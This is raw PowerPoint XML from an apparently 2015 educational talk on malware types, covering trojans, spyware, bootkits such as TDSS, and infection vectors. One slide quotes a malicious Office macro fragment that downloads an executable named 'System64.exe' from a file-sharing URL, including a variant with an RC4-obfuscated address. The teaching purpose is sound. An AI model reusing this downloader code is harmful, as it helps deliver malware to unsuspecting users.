            <a:ext cx="971550" cy="971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3048000" y="819150"/>
            <a:ext cx="1524000" cy="1014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8096664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z="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Other infection vectors:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="895350"/>
            <a:ext cx="6934200" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Office files - Macros:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5E6A71"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DoWork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5E6A71"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> As String, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> As String, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> As Long, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> As String</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5E6A71"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ge.tt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/1/files/8e8kZt72/0/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>blob?download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5E6A71"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(rc4decrypt("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>YMe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>chr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(34)&amp; lp52wsnV4"DyQw0DKMNIE_uZmPuzUL5b0WoVZ2r3E7f &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>chr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(34)&amp; jG713r1IgISh3hZD1a", "System64.exe")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5E6A71"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5E6A71"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = "System64.exe"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5E6A71"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5E6A71"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screen Shot 2015-01-06 at 10.08.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952750"/>
            <a:ext cx="5468353" cy="1741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49284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definitions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>White (clean)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Black (dirty)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Gray</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Sample</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Goat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Replication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Hash (md5 / sha1 / sha256)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60834725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top threat today</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Boot-kits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Trojan Horse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Spyware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Exploit kits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Bots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Backdoors/RAT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Ransom-ware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>POS malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Targeted malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="261031414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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1200151"/>
            <a:ext cx="7620000" cy="3394472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Bootkit virus example: TDSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="122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1"/>
            <a:ext cx="3124200" cy="2945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1" y="1771650"/>
            <a:ext cx="5497513"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itle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Bootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> Virus Example:  TDSS</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z="3200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Trojan Horse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1200151"/>
            <a:ext cx="7620000" cy="3394472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>The Trojan horse, at first glance appears to be useful software but can actually do damage once installed or run on your computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Those on the receiving end of a Trojan horse are usually tricked into opening them because they appear to be receiving legitimate software, or files from a legitimate source.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Trojan horses programs are also known to often create a backdoor to your computer that gives malicious users access to your system, possibly allowing confidential or personal information to be compromised.</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z="3200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Spyware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1143000"/>
            <a:ext cx="49530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4625" indent="-174625" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Spyware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> are programs that collect personal information without the user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>s knowledge or consent for advertorial or fraudulent purposes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="174625" indent="-174625" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr marL="174625" indent="-174625" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	In this digital age, private information like Email addresses, phone numbers, personal references and interests are valuable for several entities for marketing purposes. Spyware becomes a novel method used to harvest these details.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="174625" indent="-174625" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="174625" indent="-174625" algn="just" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="15000"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="174625" indent="-174625" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="102405" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029201" y="1085850"/>
            <a:ext cx="3046413" cy="2570559"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effec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6" y="1314450"/>
            <a:ext cx="70897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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Spyware (continued)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200">
              <a:latin typeface="Arial"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ecuritybananas.com/wp-content/uploads/2011/05/OBL_FakeAV.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126" y="1143000"/>
            <a:ext cx="6873875" cy="352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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Spyware (continued)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200">
              <a:latin typeface="Arial"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765800" y="2114550"/>
            <a:ext cx="3378200" cy="2413000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Director of Threat Intelligence Malware Operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> year in Foundstone/Labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Still love to research &amp; analyze malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Fm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sys-admin to hacker to forensics to IR to malware and now….</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5A1DC566-6DD8-4E64-B54C-9F29185D0E2F}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Wednesday, January 7, 15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
